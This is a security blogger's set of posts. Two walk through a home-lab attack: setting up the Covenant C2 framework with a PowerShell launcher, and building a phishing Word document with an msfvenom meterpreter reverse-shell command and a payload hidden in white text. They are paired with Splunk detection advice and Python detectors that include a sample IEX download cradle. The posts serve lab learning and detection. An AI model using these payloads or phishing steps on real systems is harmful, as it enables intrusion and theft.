
Updated: Oct 2

Hey Guys,

So I have been wanting to move away from Metasploit for a little while now, and after seeing how our internal Red Team works it was apparent that I needed to open my eyes to more tools. Now I can't afford Cobalt Strike and it's doubtful that I would even be granted a copy unless I managed to get it through work, due to the triage process they have to adhere to. So after a little digging and some suggestions from the Red Team, Covenant seemed to be the way to go.

I got Covenant installed and at that point I really wasn't sure how to use it, and after a ton of Googling I still couldn't find anything that pointed me in the right direction. So I wanted to write a short blog on how to set up a Listener, create a PowerShell Launcher and then hopefully get your Grunt back, allowing you to take your attack forward.

Obviously anything you learn here is educational only and anything you do with the knowledge going forward is your responsibility and yours alone. I have my own lab set up so I can test out different tools; I would suggest you do the same.

Covenant can be found here -> https://github.com/cobbr/Covenant

Install guide here -> https://github.com/cobbr/Covenant/wiki/Installation-And-Startup

Kali install commands here -> https://dotnet.microsoft.com/download/linux-package-manager/debian9/sdk-2.2.402

Be sure to use .NET SDK version 2.2, as at the time of writing version 3.0 will NOT work.

Okay, so let's get started. First fire up your Kali box and run the following commands in order -

1. wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg

2. sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/

3. wget -q https://packages.microsoft.com/config/debian/9/prod.list

4. sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list

5. sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg

6. sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list

7. sudo apt-get update

8. sudo apt-get install apt-transport-https

9. sudo apt-get update

10. sudo apt-get install dotnet-sdk-2.2

11. git clone --recurse-submodules https://github.com/cobbr/Covenant

12. cd Covenant/Covenant

13. dotnet build

14. dotnet run

That should look something like the below, and by the end look something like this.

Once you're at this point you should see that Covenant is running, and if you navigate over to https://0.0.0.0:7443 you should be good to go. Note that the IP is 0.0.0.0 because Covenant is running locally and listening on all interfaces; if this was in AWS, for example, you would browse to that host's IP instead.

You may need to add a certificate exception in your browser (Covenant uses a self-signed certificate), so go ahead and do that.

After that you should see the Covenant landing page. Happy days, you're all set up and ready to go; bang in a username and password.

So once logged in you will see the following options: Listeners, Launchers, among others. I'm not going to run through them all; you can look at them yourself and get to grips with them in your own time.

So what I wanted to go through were the basic steps to get a Grunt running using the PowerShell Launcher, so first we need to create a Listener. Fill in the details: give it a name and add in your connect address IP. This is the IP of your attacking system, i.e. the address the Grunt will call back to.

Next we need to create the Launcher. This time I'm going with the PowerShell Launcher, so fill in the options, select your Listener etc., and what I'm going to do is hit the Generate button and then copy the Encoded command into a custom script I have. There are multiple ways from here: you could host your launcher from within Covenant, you could download it and send it however you see fit, it's really up to you.

Encoded command

This is then pasted into my script.

And that's about it really. As suggested above, how you have your victim connect to you is personal preference; mostly this would be via a link or phishing email of course.

So for this example I just ran the script on my victim system. Again, this can be hosted via Covenant or sent by email etc.

The connection is then activated.

Opening the Grunt provides a whole host of information as seen below.

Then the magic is here in the Interact tab. I have just run a quick whoami, but there are all sorts of tasks already built in, and I know that Rastamouse and Cobbr are working hard to create all sorts of awesome new features.

If you have read any of my previous posts you will know that I was working on a Splunk Mitre Att&ck detection app. It looks like the image below and can be downloaded here -> https://github.com/CyberZombi3/Mitre-Attack-Monitoring (it's free if you wish to take a look). It's very high level and would need tuning for any real work environment; however, as you can see, it would pick up the above method of attack, since the launcher shows up as a PowerShell process created with an encoded command line. It should not be relied on to detect any and all methods of attack.
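To show what "picking up" the PowerShell Launcher looks like at the log level, here is an added example of my own, not part of the Mitre Att&ck Monitoring app or of Covenant. It takes process-creation records (the sample command lines and the field names are constructed for this example; map them onto whatever your 4688 or Sysmon Event ID 1 ingest produces), finds the -EncodedCommand argument, decodes it the way PowerShell does (base64 of UTF-16LE text) and checks both the raw and decoded text for strings that commonly appear in download cradles and stagers. The indicator list and the "two or more hits" rule are my own assumptions and will need tuning for your estate.

```python
import base64
import re


def encode_ps(script: str) -> str:
    """Produce what PowerShell expects after -EncodedCommand: base64 of UTF-16LE text.
    Used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation records (field names are my own choice).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "WS01", "user": "CORP\\alice",
     "command_line": "powershell.exe -enc " + encode_ps("Get-Date")},
    {"host": "WS07", "user": "CORP\\bob",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/stager')")},
]

# PowerShell accepts several spellings of -EncodedCommand; the common ones are
# listed here (any unambiguous prefix works, so extend the list if you see others).
# The lookbehind stops us matching a dash inside a word such as Get-Date.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")

# Strings that turn up in download cradles and stagers (assumed list).
# A hit is a reason to look closer, not proof of compromise.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "-w hidden", "-nop")


def decode_encoded_command(command_line: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Malformed base64 after -enc is itself worth a look, but cannot be decoded.
        return None


def analyse(event: dict) -> dict:
    """Decode any encoded command and score the combined raw + decoded text."""
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    haystack = (cmd + " " + (decoded or "")).lower()
    hits = [ind for ind in INDICATORS if ind in haystack]
    return {
        "host": event["host"],
        "user": event["user"],
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        # Assumed threshold: one hit is noise, two or more is worth an analyst's time.
        "suspicious": len(hits) >= 2,
    }


def run(events=SAMPLE_EVENTS) -> list:
    return [analyse(e) for e in events]


if __name__ == "__main__":
    for result in run():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['host']:5} {result['user']:12} {flag:10} {result['decoded']!r} {result['indicators']}")
```

The first event is plain PowerShell with no encoded command and scores nothing; the second is encoded but decodes to a harmless Get-Date and also scores nothing, which is the point of decoding rather than alerting on -enc alone; the third decodes to a download cradle and collects several indicators. In Splunk the equivalent is a search on the process command line that extracts the base64 argument and decodes it before matching.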

So I hope this has been of use to someone. As always, if you want to ask any questions you can find me @CyberZombi3 on Twitter.

Thanks

CyberZombi3

Apologies for the lack of posts. I've been a little busy lately with getting a room sorted for my recently announced little one, along with my GPEN and my OSCP and just life in general; things have been a little manic to say the least.

Anyway, I wanted to post something along the lines of phishing and how it may look in my Splunk app, Mitre Att&ck Monitoring. Then whilst I was working on it I realised I can't really show everything I would want, as I don't have that set up within my lab. So I guess I'll demo how to create a malicious document, email it to a victim to run, and then talk a little about what to look out for.

The below is just a high level view of the above mentioned process with what tools I have available to me.

So I created a macro and payload using MsfVenom with the following command - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.140.17 LPORT=4545 -e x86/shikata_ga_nai -f vba-exe

This then goes off and creates some VBA code and a payload; both need to be inserted into your malicious Word document. It looks a little like the below.

These then need to be added into the Word doc as you can see below. Just go ahead and copy and paste the code into the blank vba screen.

Create a nice looking document that suits the needs of your victim. Notice below the grey shaded area: that's the payload code, which for this demo I have shrunk down the text size of and changed the colour to white just so it's not immediately seen. This could be hidden in an image or the footer; it's really up to you how you want to go about hiding it.

So now we're ready to send the email. It appears in the victim's inbox as expected.

The user then opens the file and the payload runs. The user may be prompted to enable editing; I found that wasn't always the case when playing around with this. From then on we can see in Splunk the Word doc and what looks to be a strange looking executable run at the time of execution.

This can then be confirmed from your newly gained Meterpreter session. Below we see the creation and the connection made.

As the attacker you can then go off and do what it is you need to do, escalate privileges, steal data etc etc.

So I also wanted to talk about what you can look out for in your monitoring tools, things like -

obscure file names

office applications spawning processes

office applications attempting to connect to unknown URLs

discovery commands being run by strange user accounts, maybe at strange times of the day, for example whoami, ipconfig, net accounts

.HTA files within emails

If there are links in the email, hover over them to check the URL

If possible configure IDS / IPS & APT protection

Educate users via phishing simulations

The Splunk app I'm working on looks for all types of things based off the Mitre Att&ck framework, but 1 or 2 events alone don't automatically mean malicious activity is occurring. With my app I want to get your attention by highlighting a whole bunch of events; then you will need to manually go off and build that bigger picture of an incident, if there is one of course.

Below there are a few screenshots. I've mentioned it in some of my previous posts so you may have seen it before. I could probably release it as is now, although it's far from complete and currently does not cover the entire Mitre Att&ck framework. Let me know what you think.
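To make the "bigger picture" idea concrete, here is an added example of my own (not part of the Mitre Att&ck Monitoring app) that turns the list above into indicators and then correlates them per host. It works over Sysmon-style process-creation and network-connection events; the events, field names, working hours, 10-minute window and "three distinct indicators" threshold are all constructed or assumed for this example. The ATT&CK technique tags on the discovery commands (T1033 whoami, T1016 ipconfig, T1087/T1201 net.exe) are the standard ones; the file name of the dropped executable is made up. Each indicator on its own produces a line in the report but no escalation; only a host that racks up several different ones inside the window gets flagged.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Constructed Sysmon-style events (field names are my own).
# type is "ProcessCreate" (Event ID 1) or "NetworkConnect" (Event ID 3).
SAMPLE_EVENTS = [
    # WS07: Word spawns an oddly named exe from Temp in the small hours,
    # which then runs discovery commands.
    {"time": "2019-10-02T02:14:05", "host": "WS07", "type": "ProcessCreate",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\bob\AppData\Local\Temp\rad1E9F2.exe"},
    {"time": "2019-10-02T02:14:40", "host": "WS07", "type": "ProcessCreate",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\rad1E9F2.exe",
     "image": r"C:\Windows\System32\whoami.exe"},
    {"time": "2019-10-02T02:15:02", "host": "WS07", "type": "ProcessCreate",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\rad1E9F2.exe",
     "image": r"C:\Windows\System32\ipconfig.exe"},
    # WS01: an admin running ipconfig from a shell during the day.
    {"time": "2019-10-02T10:03:11", "host": "WS01", "type": "ProcessCreate",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"time": "2019-10-02T10:03:30", "host": "WS01", "type": "ProcessCreate",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\ipconfig.exe"},
    # WS03: Word itself makes one outbound connection. Worth a look, but alone it is just that.
    {"time": "2019-10-02T09:10:00", "host": "WS03", "type": "NetworkConnect",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "dest": "198.51.100.20:443"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DISCOVERY = {"whoami.exe": "T1033", "ipconfig.exe": "T1016", "net.exe": "T1087/T1201"}
WORK_HOURS = range(7, 20)        # assumption: 07:00-19:59 local is normal for this estate
WINDOW = timedelta(minutes=10)   # assumption: how close together hits must be
MIN_DISTINCT = 3                 # assumption: 1 or 2 indicators alone are not escalated


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def indicators_for(ev: dict) -> list:
    """Map one event onto the things the list above says to look out for."""
    hits = []
    if ev["type"] == "ProcessCreate":
        image, parent = basename(ev["image"]), basename(ev.get("parent_image", ""))
        if parent in OFFICE_APPS:
            hits.append("office_spawned_process")
        if image in DISCOVERY:
            hits.append("discovery:" + DISCOVERY[image])
        if "\\appdata\\local\\temp\\" in ev["image"].lower():
            hits.append("exe_from_temp")
    elif ev["type"] == "NetworkConnect":
        if basename(ev["image"]) in OFFICE_APPS:
            hits.append("office_network_connection")
    # "Strange time of day" only counts when there is something else to go with it,
    # otherwise every scheduled overnight job would trip it.
    if hits and datetime.fromisoformat(ev["time"]).hour not in WORK_HOURS:
        hits.append("off_hours")
    return hits


def correlate(events: list) -> dict:
    """Collect indicator hits per host and flag any host whose best WINDOW
    contains at least MIN_DISTINCT distinct indicators."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        for ind in indicators_for(ev):
            by_host[ev["host"]].append((ts, ind))
    report = {}
    for host, hits in by_host.items():
        best = set()
        for i, (t0, _) in enumerate(hits):
            window = {ind for t, ind in hits[i:] if t - t0 <= WINDOW}
            if len(window) > len(best):
                best = window
        report[host] = {"indicators": sorted(best), "escalate": len(best) >= MIN_DISTINCT}
    return report


if __name__ == "__main__":
    for host, entry in correlate(SAMPLE_EVENTS).items():
        state = "ESCALATE" if entry["escalate"] else "note"
        print(f"{host:5} {state:9} {', '.join(entry['indicators'])}")
```

WS01's lone ipconfig and WS03's single outbound connection from Word both appear in the report without escalating, which is the behaviour the paragraph above asks for; WS07 collects five different indicators within a minute and is flagged. In a Splunk app the same shape is a set of per-technique searches feeding a stats count by host over a time window.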

For anyone wanting to have a play around with phishing, I came across the Morning Catch VM a while back, and although it's a little dated now it still does the job.

Find out more about it here - https://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/

Obviously the information above should not be used to be intentionally malicious, and if that is your choice I cannot be held responsible for any of your actions; this post is for educational purposes only.

Find me on Twitter @CyberZombi3

Cheers


So just a short post really. As you know I have been working on a Mitre Att&ck Splunk dashboard, but due to my GPEN course and OSCP, among many other distractions so far this year, progress has been slow.

However, over the last few days I have managed to build out my own Splunk app, which is named Mitre Att&ck Monitoring (see below). The reason behind this was that I had a single dashboard full of searches that ran every so often, and it was just slow and kept crashing out. I figured it would be better to break the items up into the sections of the Mitre Att&ck Framework and go from there.

I might end up uploading it to SplunkBase when it's closer to being finished, but for now I'm happy to keep plodding on with it.

Anyway, as always, if you have any questions yell at me on Twitter @CyberZombi3

Thanks

CyberZombi3